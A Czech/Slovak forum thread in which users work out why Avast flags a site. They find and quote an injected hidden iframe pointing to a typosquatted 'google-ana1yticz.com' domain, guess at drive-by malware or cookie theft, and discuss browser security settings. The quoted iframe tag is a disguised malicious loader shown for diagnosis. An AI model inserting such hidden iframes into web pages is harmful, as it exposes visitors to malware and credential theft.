Je na této www vir?

a kde by tam ako mal byt vir, a jaky? Alebo co ti to hlasi?

Vlez tam s FF a nemusis sa bat virov, dokial nic neinstalujes alebo dokial nepotvrdzujes spustenie.

Řve to, že před hlavičkou !DOCTYPE (kde nemá nic strašit) je (velmi podezřelý): <iframe src="google-ana1yticz.com" width=1 height=1 style="visibility:hidden; position:absolute"> </iframe>. Dál jsem to nezkoumal. Jestli to třeba někdo blbě hacknul (uvedené http dává hlášku, že neexistuje) a do IFRAME chtěl nacpat nějaký podvodný kód...

//Edit: Spíš bych ale tipoval na cookie stealer, že tam někdo systematicky krade přihlašovací údaje uživatelů. Měl by někdo varovat provozovatele.

je to hacknute. Moze to byt exploit na pdf, predvidavy clovek ma zakazane otvaranie pdf z prehliadaca. Viem preco neznasam cokolvek automaticke, len to vysvetlite debilom v MS a debilom v adobe.

Souhlas.

Viem preco neznasam cokolvek automaticke, len to vysvetlite debilom v MS a debilom v adobe

I s tím vřele souhlasím

p.s. nesnazi sa to otvorit nejake pdf? (neviem nemam tu teraz acrobat reader).
Ak nie tak je to blbo hacknute alebo cookie stealer (bezpecnostna zasada: po diskutovani pouzivat odhlasovanie, neostavat prihlaseny).
Ano treba napisat prevadzkovatelovi, nech si ten smiesny PhpBB zaplata.

Ne, pdf mi to nechtělo cpát (mám FF). IMHO Jez. je to blbě hacknuté, ta adresa v IFRAME se zdá neexistující, což samozřejmě nelze tvrdit i do budoucna. Kdybych to hackoval já, tak to nedám na tak blbé místo. Ale ostatně když MS IE zbaští IFRAME vůbec před BODY, tak zase proč se namáhat, že .

Já si myslím, že to bude něco z Tohoto. Nedávno jsem to řešil známé. Ale ona má asi zahmyzený počítač a v momentě kdy se připojí na FTP, přenáší to tam znovu či jak. Ona tam mla pro změnu javascript za </body>.
https://www.onehelp.cz/onebit/kb/stranky-napadeny- virem

Tohle vysvětluje, jak se to na WEB dostalo. Jen bych uklidnil kolegu Petra_PM, zavirovaný počítač nemá on, ale provozovatel toho PhpBB. Navíc to vypadá, že je to historická verze toho mizerného PhpBB a bez flastrů, tudíž snadno napadnutelná.

BTW i když metody hackerů jsou úžasné. Mně se kdysi na mém WEBu objevil někde v hloubce adresářů falešný WEB nějaké banky v USA. Heslo slovníkovým útokem v žádném případě nemohli odhalit a brutal force by trval ještě příští Zeměkouli. Přesto tam někdo vlezl. Mám teorii, že to měl zavirované tehdejší hostitel mého WEBu a prolezli tam přes roota. Protože jsem v logu objevil, že to tam vlezlo od někud z Maďarska a pod rootem. Nemám však přímý přímý důkaz, tak nemůžu hostitelskou firmu jmenovat.

Mně se kdysi na mém WEBu objevil někde v hloubce adresářů falešný WEB nějaké banky v USA.

A přesně tohle se stalo tak před půl rokem mě. Majitel hostingu mi logicky zakázal forum kde se to objevilo.
Forum mám tedy na Webuzdarma, kde byly stránky dříve a za tu dobu ani jeden spam či tak. Na hostingu domény prý neustálé zatěžování a spamování (jestli na to nemůže mít vliv i doména II a III řádu.
A že bych měl škodnou sám, o tom pochybuji.

Pokud tě to uklidní, tak jsem měl v haxně hesla k nejmenovanému známému poskytovateli web. prostoru. Ten blbec (patrně "takyadmin") měl na síti nasdílen total cmd, včetně tenkrát nešifrovanému seznamu svých ftp.

zdroják zdánlivě v pořádku, ten iframe vyvolává podobu s google analytics, ve skutečnosti vede na: google-ana1yticz.com

mají to hacknuté.

Mají. To IFRAME nevěstí nic dobrého (a pro podobnost s G. Anal. tuplem), třeba je tam Cookie stealer, proto Avast chválihodně správně varuje.

Určitě to zavirované je, takhle mi cca před 3 týdny matka bezohledně zavirovala PC . Prý byla na stránkách jedné školy a tam to bylo..

Ano, je tam vir a hlásí to pouze Avast!

Též pro Marka Drtiče:
Takhle. Virus jako takový tam být nemůže. Ale je tam odkaz v IFRAME, vedoucí k nějakému lumpovi a jeho server může (je-li tak v prohlížeči povoleno) nepozorovaně nainstalovat nějaký ActiveX či přímo vira a počítač je jeho. Je to lumpárna v MS IE (a Adobu - aby M$ v tom nebyl sám - soubory PDF se k tomu též zneužívají), že dovoluje instalovat bez kontroly a dotazu notabene v defaultním nastavení. Takže stránky jsou hacknuté (někdo tam nepatřičný kód musel nacpat). Blíže nemám čas to zkoumat, může tam být instalace vira nebo jen kradení přihlašovacích údajů (nepředpokládám, že v tomto fóru si lidé vyměňují PINy kreditek jako známky - tudíž loupež peněz v tom asi nebude). Je dobře, že Avast varuje. Někdo z uživatelů toho fóra by měl informovat adminy.

Myslíš tohle?

Já MSIE nepoužívám, tak jen vyjmenuji obecně, co vidím na té kartě: Tohle určitě, dál na dotaz všechno od .NET, od ActiveX, instalace podepsaných i nepodepsaných komponent. Projet všechny možnosti a nenechat toho pacholka aby si cokoliv spouštěl a instaloval bez vědomí uživatele (i kdyby to měl být font - i tam může být schován virus).

Já ti chci jen naznačit, že tohle je default nastavení, tak jako procházení rámci mezi doménami, vše co se týká activex apod. Zhruba je to nastaveno na:

podepsané a důvěryhodné ano
nepodepsané ne/zeptat se

zbytek se dá donastavit.

Aha. Jedu už dlouho na FF, tak tohle tak nesleduji. Vím, že to dost často MSIE nainstalovalo za zádama leccos. Třeba už to zlepšili . Já osobně bych nedůvěřoval ani těm důvěryhodným a podepsaným . I když ono je to vlastně jedno. Viděl jsem uživatele, kteří klidně bezhlavě dávali [Ano] na instalaci o čem neměli ani páru. Někdy by holt měl počítač lidi mlátit...